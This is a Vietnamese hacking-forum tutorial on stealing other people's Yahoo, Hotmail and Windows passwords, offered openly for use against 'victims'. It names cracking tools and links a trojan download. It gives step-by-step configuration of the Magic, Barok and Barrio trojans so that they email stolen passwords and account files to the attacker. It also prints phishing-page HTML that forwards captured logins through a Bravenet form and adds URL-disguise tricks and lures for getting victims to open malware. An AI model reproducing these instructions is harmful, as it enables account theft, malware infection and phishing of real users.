Lời Ngõ :
Hack Pass có dể không, quả là 1 câu hỏi khó trả lời : Tôi nghĩ cũng không dễ mà cũng không khó, nếu bạn có tính kiên trì.Tuỳ theo Victim ( nạn nhân ) thôi, Nếu họ đề phòng bạn rồi thì chỉ có trời mới lấy được của họ. Bởi vậy có nhiều Bạn cứ hỏi và nhờ Tôi lấy Pass dùm , thật sự Tôi cũng không biết nói sao và làm sao cho các bạn hiểu.Và thật sự tôi cũng không có thời gian mà ngồi hack & crack dùm bạn. Và đọc xong bài hướng dẫn dưới đây Tôi hi vọng các Bạn đừng nhờ Tôi lấy dùm nữa nhé. Chính bạn lấy được thì mới cảm thấy vui
Lưu ý là bài viết này chỉ đề cập tới PassW của các tài khoảng yahoo, hotmail và máy tính thôi.Những phần mềm mà Tôi giới thiệu dưới đây sẽ không có link download, Bạn vào Google gõ các từ khoá đó mà tìm. Bạn nào có Copy bài viêt này thì cũng nên chú thích thêm tên tác giả, Tôn trọng tác giả nghĩa là Tôn trọng chính Bạn . Thanks.
xin kể cho các bạn nghe 1 câu chuyện của chính Tôi về cái dụ PassW này : cách đây cũng khoảng 1 năm - kể từ ngày Post bài này - thì Tôi có ghé vào 1 tiệm net gần nhà để chat với Em yêu nhưng ai ngờ đâu lại bị mất 1 cái nick- nick đó Tôi không xài mà lâu lâu mở lên coi tin nhắn thôi, đơn giản là vì Tôi đã đổi nick- mà trước khi mất thì Tôi cũng biết được rằng máy Tôi chơi có nhiễm Magic.Nhưng mặc kệ, để coi thử ra sao thế là qua ngày hôm sau thử login vào thử thì thấy die mất, còn nick kia Tôi chat thì vẫn còn. Bạn có biết tại sao 1 nick mất, nick kia còn không, Đơn giản là nick mất Tôi đặt Pass bình thường không có kí tực đặc biệt, nick còn thì Tôi đặt Pass có khoảng trắng nên " tên ý " không biết thôi. Thế là tôi click vào archie và thấy con magic gởi tin nhắn có pass của Tôi về cho chủ của nó. Và Tôi có nhắn cho " tên ý" rằng "You chỉ lấy được 1 nick của Tôi thôi, nick còn lai mà You lấy được thì tôi sẽ gọi You là sư phụ.he he "<-- qua câu chuyện này thì chắc các bạn đã hình dung ra được 1 PassW rắc rối lợi hại cỡ nào rồi chứ gì ?
Thôi trở lại vấn đề chính hôm nay. Tôi thấy các Bạn trong VH này luôn hỏi cách chôm PassW ? Vậy có khi nào Bạn tự đặt 1 câu hỏi rằng :
+ Có bao nhiêu cách lấy Pass không ?
+ Lấy PassW có dể không ?
+ Và phải làm như thế nào thì mới có thể lấy được ?
Theo Tôi Lấy Pass có các dạng như sau :--------------------------------------------
+ Crack
+ Dùng Trojan , Virus
+ Fake Login
+ Đoán PassW
+ Đính kèm virus vào phần mềm ứng dụng
+ Nhìn trộm.............và năn nỉ người ta cho mình PassW <-- cách này hữu hiệu àh nha .
+ Tạo ra 1 mail yahoo như : webmaster@yahoo.com, hay đại loại như là admin@yahoo.com ...--------------------------------------------
1 ) Vậy thì Crack Pass như thế nào, Cần phần mềm gì ? Đó lại là 1 câu hỏi quang trọng, vì nhiều bạn biết trên lí thuyết thôi chứ cũng không biết Crack bằng cách nào. Crack theo nghĩa tiếng Anh nghĩa là " Bẽ gãy ". Phương pháp này tốn thời gian ( Đối với các hộp mail như www.Yahoo.com hoặc www.hotmail.com ) Còn đối với Pass của máy tính thì chỉ cần 3 phút thôi.
+ Vậy thì các phần mềm Crack làm việt như thế nào ?
Nói 1 cách Logic thì Tôi không nói được ( vì không biết ). Nhưng Đơn giản là nó làm việc theo phương thức " Gọi tên" <--- Khi chạy chương trình thì nó sẽ sử dụng các pass nằm trong từ điển của nó để so sánh với Pass victim cần crack Nếu trùng thì nó giữ lại, còn không thì cho qua, thế thôi . lc4 là 1 chương trình crack nổi tiếng dùng để hack win me/Win2000 Khi chạy chương trình bên nào cũng được dù Guess hay admin thì nó cũng liệt kê trong máy của bạn có bao nhiêu tài khoảng và Pass của những tài khoảng đó.
VD :
- Phần mềm lc4 <-- Phần mềm crack pass win 2000
HomePage : www.atstake.com/lc <-- tham khoả mọi thông tin về phần mềm này
- Password Dumper for
- dùng để hack NT/2000
- HomePage : http://www.red8black.com .
khi chạy xong thì bạn theo link này mà coi Pass của admin c:\winnt\pass.txt
- Phần mềm Brute ( tên gọi chung ) <-- dùng hack nick yahoo
- DOB Cracker
- Proxy Manual Cracker
- Yahoo! Proxy Cracker
- Yahoodlum2 Overhauled
- Proxy Birthday Cracker
- Ultra Cracker
- YCrack It Biotch
2 )Dùng Trojan , Virus : dùng như thế nào, và có bao nhiêu loại trojan phục vụ cho việc này. Có rất là nhiều , không biết được là bao nhiêu. Các bạn cứ nghĩ là trong 1 ngày thì trên thế giới này có bao nhiêu Hacker viếc Trojan, mà những Trojan nào nổi tiếng thì mới bị phát hiện thôi <-- đếm trên đầu ngón tay, còn những trojan chưa bị phát hiện thì sao ?
Các Trojan & Virus phổ biến hiện nay được các " kẻ phá hoại " dùng như :
- Magic ( chôm Pass Yahoo chat )
- Barok
- Barrio
- KeyLog ( ghi lại toàn bộ những gì nhập từ bàn phím : như thẻ tín dụng, Pass ......)
- Kuang
- Dòng họ BackDoor
- Girl Friend
- Hooker
- Jigas ( sản phẩm của 1 hacker việt nam )- ...............còn rất nhiều mà Tôi không thể nhớ hết
Cách thức dùng chúng thì cũng rất đơn giản : điền đầy đủ các thông tin của bạn như Email , rồi sau đó tạo ra 1 file với đuôi *.bat , *.cmd , *.exe ......rồi sau đó gởi cho Victim thôi .Nói chung không phải nó giống nhau hoàn toàn, mà là tương tự như vậy thôi. Nếu Bạn biết xài 1 con rồi thì những con khác đối với bạn cũng đơn giản thôi
VD : Tôi sẽ hướng dẫn các Bạn xài con Magic ( lấy pass yahoo chat ) Download :
http://net-soft.t35.com/download/magic.zip
Như bạn thấy trên hình thì có các lựa chọn như :
- Send Y! Mess Pass (Gởi Pass của Victim qua tin nhắn cho Bạn )
- Send IP : Gởi địa chỉ IP của Victim cho Bạn
- Send Computer Name : Gởi tên của máy tính Victim cho Bạn
...................................................v v
Ngay phần Y! ID : Bạn điền tên nick của bạn giống như trong hình, không cần phần @yahoo.com
- Nhìn phía dưới bạn thấy dòng : Choose Icon ( only for .exe and .scr ) có các lựa chọn .Bạn chọn Icon nào mà Victim không nghi ngờ.
- phần filename : chọn tên gì cũng được
<----- saukhi khai báo xong Bạn click Create MPS,Nếu thấy thông báo MPS Create Successfuly thì có nghĩa là đã thành công , lúc này sẽ có 1 file với đuôi tuỳ chọn được tạo ra nằm cùng thư mục với MPS, Công việc còn lại của bạn là gởi file này cho Victim và dụ họ mở ra thôi hoặc chạy con này trên máy tính của bạn để người ta chơi máy của bạn bị "dính chưởng " Nếu Bạn chơi ở Net dịch vụ. Nhớ là chỉ khi nào họ vào yahoo chat thì mới " dính chưởng" thôi, các trường hợp khác thì không ảnh hưởng gì .
Hướng dẫn sử dụng Barok :
Bước 1 : Download con Barok về rồi giải nén
Bước 2 : Chạy file Client.exe
Bước 3 : click vào openserver --> chọn file barok.exe -->open
Bước 4 : ở mục
+ File name : tên file Barok.exe ( hoặc bất kỳ File nào khác )
+ Outgoing Mail server (SMTP) :
Mail.vnn.vn
+ your mail address : địa chỉ email của bạn
+ trong mục Schedule Send : * every online ( bạn đánh dấu mục nŕy thì trojan sẽ gửi account về cho bạn hàng ngày )
* Every ( bạn tùy chọn số ngày trojan gửi account về )
Bước 5 : sau khi điền đầy đủ như tręn bạn click vào save server ! Bây giờ bạn đổi tên file Barok.exe này thành tên 1 chương trình gi gì đó rồi gửi cho victim ! và cho cho victim mở File này ra là OK
Hướng dẫn sử dụng Trojan Barrio :
Bước 1 : download con Barrio về và giải nén !
Bước 2 : chạy file btrcfg.exe :
Ta thấy hiện lên một cửa sổ nhỏ --> click vào next -->ta thấy một khung nhỏ, ở đây bạn hãy đánh email của mình vào khung này --> click vào add -->click vào next.
Ta lại thấy một khung nhỏ SMTP hiện lên !Bạn hãy đánh mx1.mail.yahoo.com hoặc mx2.mail.yahoo.com --> click vào next --> click vào next lần nữa -->ta lại thấy một khung nhỏ nữa ! Ðây chính là chỗ mà ta đánh vào tên file cần lấy (vd: muốn lấy account thì bạn đánh vào *.pwl ) bạn có thể lấy bao nhiêu file trên máy victim tuỳ ý --> bạn click vào next tiếp --> lại click vào next -->cứ click liên tục đến lúc nó hiện ra một khung có chữ trojan.exe. lúc này bạn chọn đường dẫn đến một file trojan.exe khác (như hooker.exe ) hoặc một file.exe của window ( hay hơn bạn lấy file diệt virus BKAV.exe để lừa victim ) --> next -->next-->kết thúc !!
Bước 3 : Sau khi làm các bước trên bạn đã tạo ra 1 file .exe ;Bạn gửi file này cho victim ! Khi Victim mở ra thì trojan sẽ lấy tất các file mà bạn yêu cầu gửi về cho bạn qua email !! ( *.pwl là file của account ! bạn sử dụng chương trình giải mã file pwl để lấy những thông tin cần thíêt như Pass )
Đến đây thì các Bạn Newbies chắc cũng biết 1 phần nào đó về sử dụng virus rồi phải không.
Ví thời gian có hạn nên Tôi không thể nào hướng dẫn hết cách sử dụng những con virus khác nhau. Cái này Bạn có thể coi trong phần Trojan & Backdoor trong 4Rum ý .
3 ) Fake Login là gì ?
Ngay từ Fake Login ( đăng nhập ) thôi thì có lẽ các bạn cũng hình dung ra nó là gì rồi, Cái này là tạo ra 1 trang " hàng giả " giống như thật ( VD : trang login của Yahoo, Hotmail,Gmail ..và tấ cả những trang nào có Login...)
+ Cách hoạt động như thế nào :có nhiều cách, như khi gởi cho Victim thì họ đăng nhập vào trang ý là " hàng giả" mà họ không biết, cuối cùng thì pass và user của họ sẽ nằm trong mail của bạn hoặc trang Web của bạn <-- thế thôi .trước tiên muốn làm trang fake thì bạn phải biết chút ít về làm Web.Bây giờ bạn phải đi d8ang kí 1 cái form mail ( dịch vụ gởi mail trên Web ), có rất nhiều trang như thế này , bạn có thể vào http://www.braveheart.net/ để đăng kí 1 cái
Bước 1 :
Vào http://www.mail.yahoo.com/ nhấn File --> Save As lưu lại tên gì cũng được
VD: index.php
Sau đó ta sẽ được thư mục chứa các file gif và file index.php
Bước 2 :
Vào web trung gian là http://www.bravenet.com/
Sau đó đăng ký làm member ở đây
Khi đã đăng ký là member bạn vào login, sau đó bạn gia nhập http://www.bravenet.net/
Sau khi đã đăng nhập (login) bạn vào mục Email forms sau đó vào mụcc Copy/paste code
Bạn có được số code của bạn và bạn copy nó lại (ghi lại dưới dạng file txt)
Lấy vd của tôi khi tôi copy về là :
QUOTE
<!---------------- BEGIN BRAVENET CODE -------------->
<div align="center"><br /><br />
<form action="http://pub1112.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="154875457545" />
<input type="hidden" name="cpv" value="1" />
<table cellpadding="0" cellspacing="0" border="0"
bgcolor="#999999"><tr><td>
<table border="0" cellpadding="10" cellspacing="1"
bgcolor="#999999"><tr bgcolor="cornsilk"><td>
<font face="Verdana,Arial,Helvetica" size="1"><b>What is your
name?</b></font><br />
<input type="text" name="name" size="20" /><br />
<font face="Verdana,Arial,Helvetica" size="1"><b>Where are you
from?</b></font><br />
<input type="text" name="where" size="20" /><br>
<font face="Verdana,Arial,Helvetica" size="1"><b>E-mail
address?</b></font><br />
<input type="text" name="replyemail" size="20"><br />
<br /><div align="center">
<input type="submit" name="submit" value=" Send ">
<input type="reset" name="reset" value=" Clear ">
</div></td></tr></table></td></tr></table>
<br /><a href="http://www.bravenet.com/">
<img src="http://images.bravenet.com/brpics/formbutt.gif" border="0"
width="100" height="35" /></a>
</form></div>
Trong đó cần lưu ý dòng cực kỳ quan trọng sau :
QUOTE
<form action="http://pub1112.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="154875457545" />
<input type="hidden" name="cpv" value="1" />
Cái dòng này là để gửi password ăn cắp được về hòm thư của bạn
Chú ý cái ở trên là vd vì đó là của tôi, bạn sẽ có 1 dòng như vậy chỉ có điều số code <input type="hidden" name="usernum" value="154875457545" />
value="154875457545" sẽ khác của tôi (thế thì mới send về hòm thư của ban được)
Bước 3 :
Mở file htm mà bạn lấy của mail.yahoo.com
Sau đó chèn đoạn code mà http://www.bravenet.com/ send về hòm thư cho bạn vd của tôi là :
QUOTE
<form action="http://pub1112.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="154875457545" />
<input type="hidden" name="cpv" value="1" />
Nhớ là chèn ở dòng đâu của php nha
Sau đó save htm lại thế là ok
Sau đó bạn chỉ việc upload index.htm và các file ảnh lên 1 host nào đó thôi, Công việt này thì dể dành đối với ai từng làm Web. VD www.tenban.t35.com
Sau đó dụ victim vào hòm thư qua trang web của bạn trên www.t35.com là ok. ID và Password sẽ được gửi về hòm thư của bạn với người gửi là notify@brave.net.com
note : vì cái này không đưa pass của bạn vào yahoo nên chỉ dụ victim gõ chính xác 1 lần thôi.
Nhưng nếu tinh mắt thì sẽ bị phát hiện liền. Bạn cần mã hoá link dài dòng, càng dài càng tốt
VD http://tenban.t35.com/isapi/index.php?redi...d=&ar=pass&sba=?
khi lên trình duyệ thì phần http://tenban.t35.com và ar=pass&sba=? sẽ bị che khuất trên thanh address. Ở trên là Tôi mô phỏng thôi chứ không chắc là link đó chạy được
- có 1 lổi trong IE mà hầu hết ít người để ý
VD : www.vnn.vn@http://tenban.t35.com <-- khi lên trình duyệt thì nó sẽ chạy trang http://tenban.t35.com chứ không phải là www.vnn.vn . Bạn hiểu Tôi nói gì chứ
.... Còn nhiều nữa , Tôi nhớ là trong Rum có hướng dẫn rồi , Bạn vào đó tìm thử
4 ) Đoán PassW : cách này thì đôi lúc lại gặt hái được thành công ấy.Trước khi muốn Hack 1 PassW nào thì bạn hãy nắm rõ tên của chủ nhân ý như : tên , tuổi , địa chỉ ,bạn gái hay bạn trai của họ,số ĐT .....Rồi hãy đăng nhập PassW với những gì bạn có thử xem <-- Mò kim đáy biển
5 ) Đính kèm virus vào phần mềm ứng dụng : sau khi tạo ra virus thì nhiều khi bị Victim nghi ngờ, có thể không dụ được,Khi chạy thì cả 2 điều chạy luôn nên Victim ít nghi ngờ Bạn có thể dùng các phần mềm đính kèm Virus vào phần mềm như :
+ Binder
+ godwill <-- kèm virus vào trang Web, nhưng không còn hiệu quả với các version mới của IE hiện nay
6 ) Nhìn trộm : cách này thì Tôi nói giỡn thôi . Trường hợp bạn vào 1 dịch vụ chat nào đó ... mà ngồi gần Iêm nào mà xinh thế .... mà gõ phím thì chậm <-- thế thì tại sao không nhìn " iêm " gõ cái gì chứ ... biết đâu lại thu được kết quả thì sao ( chỉ áp dụng cho trường hợp này thôi ).
7 ) Nếu Bạn có trang web riêng thì hãy tạo ra 1 trang hướng dẫn lấy PassW bằng cách dụ như sau :
--------------------------------------------------
Nếu bạn muốn lấy pass của ai thì hãy gởi mail đến địa chỉ này với lời nhắn theo mẫu sau :
sendTo : adminyahoo@yahoo.com // thí dụ , đây là mail của bạn đã tạo ra trước
từ mailcuaban@yahoo.com
pass : 123456
Please take my pass, my Y!ID : victim@yahoo.com // ID của victim
thanks.
--------------------------------------------------
Note: ở trên là Tôi mô phỏng thôi , còn làm sao để thuyết phục victim gởi ID & Pass của họ là tuỳ Bạn.Các bạn có hiểu Tôi nói gì không ? Đây chẳng qua là trò dụ người mới biết chat mà ham lấy Pass của người khác thôi.Trong đó adminyahoo@yahoo.com là mail của bạn, bạn vào yahoo mà tạo ra cái tương tự như vậy , nghe sao giống giống mail của webmaster của yahoo ý để cho người ta khỏi nghi ngờ. Khi Tôi lướt Web thì Tôi cũng thấy nhiều trang làm theo cách này .và trên 4rum của VH thì Tôi cũng thấy có 1 mem copy bài ở đâu ý rồi Post lên , trong đó cũng có cách này, mà xét thấy Copy & Paste bậy bạ nhảm nhí nên Tôi đã move vào ... sọt rác ( vì không đọc hết bài mà lại Post, với lại hướng dẫn như vậy thì gíông như không biết gì rồi )
8 ) Các thủ thuật bắt Victim mở trojan của bạn :
- gởi mail nặc danh kèm Virus với ĐC mail của 1 người nào đó mà Victim không nghi ngờ
- gởi phần mềm ứng dụng có kèm Virus cho Victim
- Gởi 1 card chúc mừng với link Fake login
................. Bạn có thể tìm thêm, vì cái này thì phải tự bạn suy nghĩ thôi, cách càng mới thì hiệu quả càng cao.
" Hãy với tới bầu Trời, vì nếu không chạm tới được thì bạn cũng đã ở giữa những Vì sao tinh tú "